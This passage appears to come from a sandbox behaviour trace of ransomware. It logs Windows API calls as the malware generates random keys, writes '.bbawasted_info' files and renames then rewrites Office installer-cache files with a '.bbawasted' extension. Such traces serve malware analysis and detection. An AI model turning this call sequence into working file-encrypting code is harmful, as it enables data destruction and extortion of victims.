users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.358] WriteFile (in: hFile=0x110, lpBuffer=0x5cb990*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5cb990*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.359] SetEndOfFile (hFile=0x110) returned 1 [0068.359] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.359] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb990 | out: hHeap=0x580000) returned 1 [0068.359] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.bbawasted")) returned 1 [0068.360] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0068.360] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0068.360] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x10676 [0068.360] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10676) returned 0xfe0000 [0068.360] CloseHandle (hObject=0x118) returned 1 [0068.364] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5be8c0) returned 1 [0068.365] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x1b8, pbBuffer=0x5cb9d8 | out: pbBuffer=0x5cb9d8) returned 1 [0068.365] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.365] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5be8c0) returned 1 [0068.366] CryptGenRandom (in: hProv=0x5be8c0, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.366] CryptReleaseContext (hProv=0x5be8c0, dwFlags=0x0) returned 1 [0068.375] SetEndOfFile (hFile=0x110) returned 1 [0068.377] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d6f68 | out: hHeap=0x580000) returned 1 [0068.377] CloseHandle (hObject=0x110) returned 1 [0068.405] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.405] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bef08 | out: hHeap=0x580000) returned 1 [0068.405] _aulldvrm () returned 0x0 [0068.405] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.406] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.406] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.406] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0068.406] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a2) returned 0x5c77b0 [0068.406] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.406] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5db068 [0068.406] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.407] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5db068 | out: pbBuffer=0x5db068) returned 1 [0068.407] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.407] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.407] WriteFile (in: hFile=0x110, lpBuffer=0x5db068*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5db068*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.408] SetEndOfFile (hFile=0x110) returned 1 [0068.408] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.409] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db068 | out: hHeap=0x580000) returned 1 [0068.409] lstrcpyW (in: lpString1=0x5c7848, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted")) returned 1 [0068.409] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0068.410] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0068.410] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x2488 [0068.410] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2488) returned 0x570000 [0068.410] CloseHandle (hObject=0x11c) returned 1 [0068.412] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.413] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5db0b0 | out: pbBuffer=0x5db0b0) returned 1 [0068.413] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.413] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.414] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.414] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.423] SetEndOfFile (hFile=0x110) returned 1 [0068.425] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db680 | out: hHeap=0x580000) returned 1 [0068.425] CloseHandle (hObject=0x110) returned 1 [0068.426] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.426] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf000 | out: hHeap=0x580000) returned 1 [0068.427] _aulldvrm () returned 0x0 [0068.427] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.427] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.427] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.428] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0068.428] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a6) returned 0x5c77b0 [0068.428] lstrcpyW (in: lpString1=0x5c784c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.429] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5db068 [0068.429] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.429] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5db068 | out: pbBuffer=0x5db068) returned 1 [0068.429] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.429] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.430] WriteFile (in: hFile=0x110, lpBuffer=0x5db068*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5db068*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.431] SetEndOfFile (hFile=0x110) returned 1 [0068.431] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.431] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db068 | out: hHeap=0x580000) returned 1 [0068.431] lstrcpyW (in: lpString1=0x5c784c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.bbawasted")) returned 1 [0068.432] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0068.432] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0068.432] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0xe00 [0068.432] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe00) returned 0x570000 [0068.433] CloseHandle (hObject=0x120) returned 1 [0068.435] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.435] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5beeb8 | out: pbBuffer=0x5beeb8) returned 1 [0068.436] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.436] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.436] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.436] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.447] SetEndOfFile (hFile=0x110) returned 1 [0068.449] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db478 | out: hHeap=0x580000) returned 1 [0068.449] CloseHandle (hObject=0x110) returned 1 [0068.450] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.450] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf0f8 | out: hHeap=0x580000) returned 1 [0068.450] _aulldvrm () returned 0x0 [0068.450] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.451] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.451] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.451] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0068.451] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c4) returned 0x5c77b0 [0068.451] lstrcpyW (in: lpString1=0x5c786a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.451] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5db068 [0068.451] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.452] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5db068 | out: pbBuffer=0x5db068) returned 1 [0068.452] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.452] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.453] WriteFile (in: hFile=0x110, lpBuffer=0x5db068*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5db068*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.454] SetEndOfFile (hFile=0x110) returned 1 [0068.454] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.454] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5db068 | out: hHeap=0x580000) returned 1 [0068.454] lstrcpyW (in: lpString1=0x5c786a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.bbawasted")) returned 1 [0068.458] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0068.458] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0068.458] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x545 [0068.458] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x545) returned 0x570000 [0068.458] CloseHandle (hObject=0x120) returned 1 [0068.461] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.461] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dc0b8 | out: pbBuffer=0x5dc0b8) returned 1 [0068.461] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.461] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.462] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.462] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.471] SetEndOfFile (hFile=0x110) returned 1 [0068.473] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dffb0 | out: hHeap=0x580000) returned 1 [0068.473] CloseHandle (hObject=0x110) returned 1 [0068.474] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.474] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.474] _aulldvrm () returned 0x0 [0068.474] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.475] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.475] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.475] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0068.475] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c2) returned 0x5c77b0 [0068.475] lstrcpyW (in: lpString1=0x5c7868, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.475] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5dc070 [0068.475] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.476] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5dc070 | out: pbBuffer=0x5dc070) returned 1 [0068.476] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.476] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.476] WriteFile (in: hFile=0x110, lpBuffer=0x5dc070*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5dc070*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.477] SetEndOfFile (hFile=0x110) returned 1 [0068.478] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.478] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.478] lstrcpyW (in: lpString1=0x5c7868, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.bbawasted")) returned 1 [0068.478] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0068.478] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0068.478] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x119fe94 | out: lpFileSizeHigh=0x119fe94*=0x0) returned 0x91975 [0068.479] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91975) returned 0x11a0000 [0068.479] CloseHandle (hObject=0x114) returned 1 [0068.502] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0068.503] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dc0b8 | out: pbBuffer=0x5dc0b8) returned 1 [0068.503] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.503] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0068.504] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0068.504] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.512] SetEndOfFile (hFile=0x110) returned 1 [0068.514] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dffb0 | out: hHeap=0x580000) returned 1 [0068.514] CloseHandle (hObject=0x110) returned 1 [0068.516] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0068.516] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5babd0 | out: hHeap=0x580000) returned 1 [0068.516] _aulldvrm () returned 0x0 [0068.516] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0068.517] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0068.517] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.517] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0068.517] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b0) returned 0x5baab8 [0068.517] lstrcpyW (in: lpString1=0x5bab5e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0068.517] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5dc070 [0068.517] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0068.521] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5dc070 | out: pbBuffer=0x5dc070) returned 1 [0068.521] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0068.521] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.bbawasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0068.521] WriteFile (in: hFile=0x110, lpBuffer=0x5dc070*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5dc070*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0068.522] SetEndOfFile (hFile=0x110) returned 1 [0068.522] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.522] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5dc070 | out: hHeap=0x580000) returned 1 [0068.522] lstrcpyW (in: lpString1=0x5bab5e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0068.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all 